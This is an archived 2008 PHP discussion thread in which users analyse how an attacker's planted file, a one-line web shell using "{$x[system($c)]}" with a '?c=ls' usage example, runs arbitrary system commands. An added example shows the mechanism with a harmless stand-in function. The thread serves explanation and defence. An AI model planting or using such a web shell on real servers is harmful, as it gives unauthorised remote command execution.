Posted by Tim Martin on 11/30/08 11:57
Tim Martin wrote:
> Oski wrote:
>
>> our server got hacked through a security hole in an open source php
>> chat script.
>> (nothing new so far, ok!)
>>
>> This chat script allowed the user to create a new php script on our
>> server, with the following content: (the code between the two "..."
>> from the hacker):
>>
>> <?
>> $name = "{$x[system($c)]}";
>> // some more lines omitted ...
>> ?>
>>
>> save these lines as e.g. /sys.php and call it with your browser:
>> http://localhost/sys.php?c=ls
>> and you can execute any system command and see the results!
>>
>> But: How does it work? The content of a variable being executed and
>> written to the browser?
>> If it were just "system($c)" then I understood.
>
> If you write
> $a = "{$x['key']}";
>
> then $a gets the value $x['key'] as expected.
>
> $a = $x[system($c)];
>
> then $a gets the element of the array $x corresponding to the return
> value of system($c) (and as a side-effect, system($c) has been called).
>
> It seems like combining these two features allows you to execute code
> within a double-quoted string, merely by referencing the string literal.
>
> I'm not sure if this is an intentional feature or not, hence whether
> it's a security hole or not. At the very least I think it deserves more
> emphasis in the manual page about quoted strings. Nothing I can see in
> the manual page mentions that arbitrary code could be executed.
Following up to myself, I should note that this is not as big an issue
as it seems on the surface - it only matters if the malicious user
writes the string literal itself. If they control a variable that is
substituted into the string literal, it isn't a problem. e.g.
$intermediate = 'system($c)'; // Set by malicious user from a form input
// or some other non-string-literal
$a = "{$x[$intermediate]}"; // This code written by you, not under the
// control of the malicious user
is fine.
Tim
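To make the two cases Tim describes concrete, here is an added example (not code from the thread) that uses a harmless hypothetical function record_call() in place of system(), so the difference between a call written inside the string literal and a call name merely interpolated from a variable can be observed safely:

```php
<?php
// Added example: why "{$x[expr]}" in a double-quoted string evaluates expr.
// record_call() is a hypothetical, harmless stand-in for system($c).
$calls = 0;

function record_call(string $arg): string {
    global $calls;
    $calls++;                  // side effect, like system() running a command
    return "key-" . $arg;      // return value becomes the array index
}

// Constructed sample array: one key for each case below.
$x = [
    'key-ls'          => 'value for key-ls',
    'record_call($c)' => 'literal key, nothing executed',
];
$c = 'ls';

// Case 1: the function call is part of the string literal itself.
// PHP parses {$x[record_call($c)]} as an array-index expression, so
// record_call() runs the moment the string is evaluated.
$name = "{$x[record_call($c)]}";
echo "case 1: name={$name}, calls={$calls}\n";   // calls is now 1

// Case 2: the untrusted party only controls a variable that is interpolated.
// $intermediate is plain data used as the array key; it is never evaluated.
$intermediate = 'record_call($c)';
$a = "{$x[$intermediate]}";
echo "case 2: a={$a}, calls={$calls}\n";         // calls is still 1
```

Run with `php example.php`; the counter only increments in case 1, which is why the hole requires the attacker to write the PHP source (as the chat script's file-creation bug allowed) rather than just supply a value.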